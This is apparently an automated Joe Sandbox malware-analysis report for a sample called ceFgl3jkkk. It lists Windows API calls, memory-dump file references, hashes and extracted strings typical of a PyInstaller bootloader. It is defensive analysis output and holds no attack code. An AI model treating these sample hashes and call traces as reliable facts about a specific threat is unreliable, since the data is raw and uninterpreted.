                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0d8cb16c0ed68794755dee3499a829f3980c3b08fb60c41143e5e71e23a383f7
                                                                                                                      • Instruction ID: 100c7452f0deb6b0d23e240a3caaaeb17fbaae67ae8569e991c19c1506b6a2a0
                                                                                                                      • Opcode Fuzzy Hash: 0d8cb16c0ed68794755dee3499a829f3980c3b08fb60c41143e5e71e23a383f7
                                                                                                                      • Instruction Fuzzy Hash: C9F0FC32901E145AD7213B6ADC05B5B36E88F81376F140755FE38931D1CB7DE90ABBA1
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F663F6,00000001,00000364,00000006,000000FF,?,?,00F5E61E,00F63B9D,?,?,00F62C8E), ref: 00F67065
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 4f595e8d34d4b131a741000f2197e8a270a8dbc5d6f4d5ba275a44650c1a2156
                                                                                                                      • Instruction ID: dfc755ca9c7628ede7eaa05474e3197fa3aad0c210fd61459e14adb2f4c8c4f3
                                                                                                                      • Opcode Fuzzy Hash: 4f595e8d34d4b131a741000f2197e8a270a8dbc5d6f4d5ba275a44650c1a2156
                                                                                                                      • Instruction Fuzzy Hash: F8F0BE32A08329B6EB317B629C15B6B37589B817B8B244121FC08AA1C0CB24D841B6F0
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00F60F97,00F7EE98,00000018,00000003,00F7EEB8), ref: 00F65BD4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 81edc46d480ececd6ba9d3873fcde259bf81b5642f897dd4fd5ae207ff66cab5
                                                                                                                      • Instruction ID: fc02fb2bba9634e03361d370ad02d32b42a880e516708c6aca3ca04088f08efa
                                                                                                                      • Opcode Fuzzy Hash: 81edc46d480ececd6ba9d3873fcde259bf81b5642f897dd4fd5ae207ff66cab5
                                                                                                                      • Instruction Fuzzy Hash: 53E0E531904A3857E62126629C01B5E36589BC2BF0F590021EC08B20C0DF50DC0072E5
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F63EF0
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1353095263-0
                                                                                                                      • Opcode ID: d506a703889d1df9b84338a8fc89d2461505e676fc6750c7c70b1ee1d0b25cda
                                                                                                                      • Instruction ID: 68d517dbbbab155f516ebd410f7eab8e7d3e5845cae8cc1f0d9716a8d14d35cf
                                                                                                                      • Opcode Fuzzy Hash: d506a703889d1df9b84338a8fc89d2461505e676fc6750c7c70b1ee1d0b25cda
                                                                                                                      • Instruction Fuzzy Hash: B4F06D375502059F8724CE6CD900A82BBE4EF993217108529E89DD3220D330F912CB80
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F56990: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00F5246C,?,?,00000400,?,00000000,00000800), ref: 00F569A8
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,00F542A0,?,?,?,?,?,00F532CB,00000000,00000000), ref: 00F562A9
                                                                                                                        • Part of subcall function 00F5E365: _free.LIBCMT ref: 00F5E378
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLibraryLoadMultiWide_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186588979-0
                                                                                                                      • Opcode ID: 033691ccf5149d40cb841d55adc04927bfbf128c4c070bcb14c755458dadf0a9
                                                                                                                      • Instruction ID: d53d8e0c70de29091bbc44167acdf27ef22b9d8e3a3adfc621b8985a03366562
                                                                                                                      • Opcode Fuzzy Hash: 033691ccf5149d40cb841d55adc04927bfbf128c4c070bcb14c755458dadf0a9
                                                                                                                      • Instruction Fuzzy Hash: CBD0A773B4021033F52062B53C0BF1B79649BD1F52F040438FB08DB1C1E564690963A3
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00F6E57F,?,?,00000000,?,00F6E57F,00000000,0000000C), ref: 00F6E23A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 7981c14998fc25a05b7d19db6cf91c22a0eae49ebeeaf885383825aaae4742d4
                                                                                                                      • Instruction ID: f10a66afa7e949adf7d90b9b5c31a54a8b797fbcd415b6d70d92198432e69040
                                                                                                                      • Opcode Fuzzy Hash: 7981c14998fc25a05b7d19db6cf91c22a0eae49ebeeaf885383825aaae4742d4
                                                                                                                      • Instruction Fuzzy Hash: F6D06C3210010DBBDF028F84DC06EDA3BAAFB4C714F018000FA5856020C772E961EB91
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F5E378
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1353095263-0
                                                                                                                      • Opcode ID: cb0e52e07d19aed88f44ef5871020cea48750a9e516630401a30a74b753e8c05
                                                                                                                      • Instruction ID: 2de662f20f6b9d75b6e0769f2c72da5dfc320ee6b1c78629d1e5ea01de47a5b6
                                                                                                                      • Opcode Fuzzy Hash: cb0e52e07d19aed88f44ef5871020cea48750a9e516630401a30a74b753e8c05
                                                                                                                      • Instruction Fuzzy Hash: 97C04C71500248BBDB059B45D907E5E7BB9DB80364F204054F41557261DBB5EF44A690
                                                                                                                      APIs
                                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00F6042B
                                                                                                                      • GetLastError.KERNEL32 ref: 00F60438
                                                                                                                        • Part of subcall function 00F60624: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00F604A8,?), ref: 00F60649
                                                                                                                        • Part of subcall function 00F60624: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,00F604A8,?,?,?,?,00F604A8,?), ref: 00F6065D
                                                                                                                      • FindNextFileW.KERNEL32(?,?,?), ref: 00F6055A
                                                                                                                      • GetLastError.KERNEL32 ref: 00F60564
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3693236040-0
                                                                                                                      • Opcode ID: 1b5a516881bae2cec06a0d0043463566a7af8e0656e9601bdf979be2eb493b4e
                                                                                                                      • Instruction ID: 0ae6789b775f2cab069fe7cd0f2c318e5b4abd73dd0ef3a09e83c59c552c8d7b
                                                                                                                      • Opcode Fuzzy Hash: 1b5a516881bae2cec06a0d0043463566a7af8e0656e9601bdf979be2eb493b4e
                                                                                                                      • Instruction Fuzzy Hash: E551D7B19006189FCB35EFB4CC85AABB7E8AF44314F240A56E516C7281EF78DE44AF50
                                                                                                                      APIs
                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F59EED
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00F59FB9
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F59FD9
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00F59FE3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 254469556-0
                                                                                                                      • Opcode ID: 166596d5fdfb0bf12ea1267aad2eb40ab6bfda72bbee71e74c74db34677bfb63
                                                                                                                      • Instruction ID: 57b4577b6469121106d9eba3259d8e8c36f7b6ef624ed7648801377cda07a101
                                                                                                                      • Opcode Fuzzy Hash: 166596d5fdfb0bf12ea1267aad2eb40ab6bfda72bbee71e74c74db34677bfb63
                                                                                                                      • Instruction Fuzzy Hash: AB315A75D0521DDBDB10DF64D9897CCBBF8AF08305F1041AAE50CA7250EB709B88AF45
                                                                                                                      APIs
                                                                                                                      • GetProcAddress.KERNEL32(00F531FD,Tcl_Init), ref: 00F55282
                                                                                                                      • GetProcAddress.KERNEL32(00F531FD,Tcl_CreateInterp), ref: 00F552AB
                                                                                                                        • Part of subcall function 00F52290: GetLastError.KERNEL32(?,00000000), ref: 00F522AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$ErrorLast
                                                                                                                      • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                      • API String ID: 4214558900-2208601799
                                                                                                                      • Opcode ID: a0fc877d171adfd2ed7000cb62b6bb94d57ecf5a4a5ecd5408dc674aacfad696
                                                                                                                      • Instruction ID: 7c67fa0a043817b5edd0f48540477e452df1304ebb6fe0ebe541d920b6d020c0
                                                                                                                      • Opcode Fuzzy Hash: a0fc877d171adfd2ed7000cb62b6bb94d57ecf5a4a5ecd5408dc674aacfad696
                                                                                                                      • Instruction Fuzzy Hash: 7DB1AF76F94B1A215640273D7C529A93B984ED2F377008337FA28E81D1FBD1C68976A3
                                                                                                                      APIs
                                                                                                                      • GetDialogBaseUnits.USER32 ref: 00F51B0B
                                                                                                                      • MulDiv.KERNEL32(?,00000032,00000004), ref: 00F51B21
                                                                                                                      • MulDiv.KERNEL32(00000000,0000000E,00000008), ref: 00F51B32
                                                                                                                      • SystemParametersInfoW.USER32(00000029,000001F8,000001F8,00000000), ref: 00F51B7B
                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00F51B8D
                                                                                                                      • #380.COMCTL32(00000000,00007F01,00000001,?), ref: 00F51BAD
                                                                                                                      • CreateWindowExW.USER32(00000000,STATIC,00000000,50000003,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51BE4
                                                                                                                      • CreateWindowExW.USER32(00000000,STATIC,00000000,50000000,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51C17
                                                                                                                      • CreateWindowExW.USER32(00000200,EDIT,00000000,50300884,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 00F51C4D
                                                                                                                      • CreateWindowExW.USER32(00000000,BUTTON,Close,50000001,80000000,80000000,80000000,80000000,?,00000001,?,00000000), ref: 00F51C83
                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,?), ref: 00F51C9D
                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F51CAB
                                                                                                                      • SendMessageW.USER32(?,00000172,00000001,?), ref: 00F51CBC
                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CD0
                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CE2
                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51CF4
                                                                                                                      • SendMessageW.USER32(?,00000030,?,00000001), ref: 00F51D06
                                                                                                                      • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00F51D13
                                                                                                                      • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00F51D22
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00F51D2C
                                                                                                                        • Part of subcall function 00F51E30: GetDC.USER32(?), ref: 00F51E50
                                                                                                                        • Part of subcall function 00F51E30: SelectObject.GDI32(00000000,?), ref: 00F51EA0
                                                                                                                        • Part of subcall function 00F51E30: DrawTextW.USER32(00000000,?,000000FF,?,00002550), ref: 00F51EB5
                                                                                                                        • Part of subcall function 00F51E30: SelectObject.GDI32(00000000,00000000), ref: 00F51EC6
                                                                                                                        • Part of subcall function 00F51E30: ReleaseDC.USER32(?,00000000), ref: 00F51ECF
                                                                                                                        • Part of subcall function 00F51E30: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F1C
                                                                                                                        • Part of subcall function 00F51E30: MoveWindow.USER32(?,?,?,?,00000014,00000001,?,?,?,?,?,?,?,00000032,00000004), ref: 00F51F4B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$Create$MoveObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                      • String ID: @U=u$BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                      • API String ID: 4195728924-25750965
                                                                                                                      • Opcode ID: 3c18f9affd25c9dc881479f8d8ce43079b7ba192e61f58d354c1a3a554b129e7
                                                                                                                      • Instruction ID: 6898291b3241382566754ad895d9d568f41699417e5133de9651262db7700f52
                                                                                                                      • Opcode Fuzzy Hash: 3c18f9affd25c9dc881479f8d8ce43079b7ba192e61f58d354c1a3a554b129e7
                                                                                                                      • Instruction Fuzzy Hash: 83612F31680314FAFB315F508C8AF967F65EF08B01F244166BF087D1E6D6B1A524EB6A
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3409252457-0
                                                                                                                      • Opcode ID: ed6bcccc665aa8bb5381d8e38cae2c9e33cd55fdc12e65e2b80ebb1c3a9ae4fa
                                                                                                                      • Instruction ID: 7eebc7faafd60e2475b944ebb65371d9c55c0f583b754b6d4413a7724ec5b1a3
                                                                                                                      • Opcode Fuzzy Hash: ed6bcccc665aa8bb5381d8e38cae2c9e33cd55fdc12e65e2b80ebb1c3a9ae4fa
                                                                                                                      • Instruction Fuzzy Hash: 7DD108B1D00305AFDB24AFA48C42A7E77B4EF513A4F04436DE915A7281EF759902FB61
                                                                                                                      APIs
                                                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 00F5254A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                                                      • String ID: %s%s%s$%s%s%s%s%s$%s%s%s%s%s%s%s$%s%s%s.exe$%s%s%s.pkg$Archive not found: %s$Archive path exceeds PATH_MAX$Error copying %s$Error extracting %s$Error opening archive %s$malloc
                                                                                                                      • API String ID: 601868998-2292630174
                                                                                                                      • Opcode ID: 95fdfbe431a48bd0e541fa71c2891248da0206687d180c950dbde6f5693ccf93
                                                                                                                      • Instruction ID: 1037d075f602eea2b7624eb9bc4f1bdeb171a943359c180db230c02fa46f2082
                                                                                                                      • Opcode Fuzzy Hash: 95fdfbe431a48bd0e541fa71c2891248da0206687d180c950dbde6f5693ccf93
